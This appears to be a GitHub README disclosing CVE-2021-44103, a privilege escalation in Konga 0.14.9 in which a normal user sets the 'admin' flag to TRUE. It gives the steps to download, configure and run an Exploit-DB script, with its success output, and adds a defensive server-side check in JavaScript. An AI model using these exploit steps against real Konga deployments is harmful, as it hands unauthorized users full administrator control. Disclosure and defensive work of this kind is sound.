paulotrindadec / CVE-2021-44103

CVE-2021-44103

A proof of concept for KONGA 0.14.9 - Privilege Escalation.

Intro

On November 16, 2021, Fabrício Salomão and I found a vulnerability in Konga API Gateways, allowing any authenticated user to become an administrator.

Report Vulnerability

Product: KONGA
Model: 0.14.9
Vulnerability: Privilege Escalation
Impact: Full admin access (vertical privilege escalation)
Authentication: required
Exploit Author: Fabricio Salomao / Paulo Trindade

PoC

Below, a normal user called "usernormal" was created without privileges.

Through the request below, the flag in the "admin" parameter was changed from "FALSE" to "TRUE".

We therefore created an exploit: https://www.exploit-db.com/exploits/50521

After running the exploit, the privilege escalation was a success!

Result: [screenshot]

Running the exploit

wget https://www.exploit-db.com/raw/50521 -O 50521.py

Edit 50521.py

Modify:

urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga"            # change user
password = "changeme"                     # change password

Execute:

python 50521.py

[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success
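
The PoC works because an authenticated, non-admin request was allowed to set the "admin" parameter. A server-side check that refuses such an update is sketched here as an added example; it is not Konga's code, not its fix, and not part of the original PoC. The names `authorizeUserUpdate` and `PRIVILEGED_FIELDS` and the shape of the requester object are hypothetical.

```javascript
// Fields only an administrator may change (assumed list; "admin" is the
// parameter named on this page).
const PRIVILEGED_FIELDS = new Set(['admin']);

// requester: identity from the verified session or token, never from the body.
// targetId:  id of the user record being updated.
// body:      untrusted JSON body of the update request.
function authorizeUserUpdate(requester, targetId, body) {
  if (!requester || typeof requester.id === 'undefined') {
    return { allowed: false, status: 401, reason: 'not authenticated' };
  }
  if (body === null || typeof body !== 'object' || Array.isArray(body)) {
    return { allowed: false, status: 400, reason: 'body must be a JSON object' };
  }
  const isAdmin = requester.admin === true; // strict: the string "true" is not admin
  if (!isAdmin && String(requester.id) !== String(targetId)) {
    return { allowed: false, status: 403, reason: 'cannot modify another user' };
  }
  // Null prototype: a "__proto__" key in the body becomes plain data and
  // cannot smuggle an inherited "admin" property into the result.
  const changes = Object.create(null);
  for (const [key, value] of Object.entries(body)) {
    if (PRIVILEGED_FIELDS.has(key.toLowerCase())) {
      if (!isAdmin) {
        // Reject instead of silently dropping, so the attempt shows up in logs.
        return { allowed: false, status: 403, reason: `field "${key}" requires admin` };
      }
      if (typeof value !== 'boolean') {
        return { allowed: false, status: 400, reason: `field "${key}" must be boolean` };
      }
    }
    changes[key] = value;
  }
  return { allowed: true, status: 200, changes };
}

// Constructed sample requests (not captured traffic).
const normalUser = { id: 10, admin: false };
const adminUser = { id: 1, admin: true };
console.log(authorizeUserUpdate(normalUser, 10, { admin: true }));    // denied, 403
console.log(authorizeUserUpdate(normalUser, 10, { firstName: 'N' })); // allowed
console.log(authorizeUserUpdate(adminUser, 10, { admin: true }));     // allowed
```

The 403 responses are also a useful detection signal: a non-admin account submitting a privileged field has no legitimate reason to do so.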

LINKS

http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html

https://www.exploit-db.com/exploits/50521

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103

https://github.com/advisories/GHSA-f2mp-8fgg-7465

https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821

https://twitter.com/CVEnew/status/1508455166885961732

https://twitter.com/search?q=CVE-2021-44103&src=typed_query
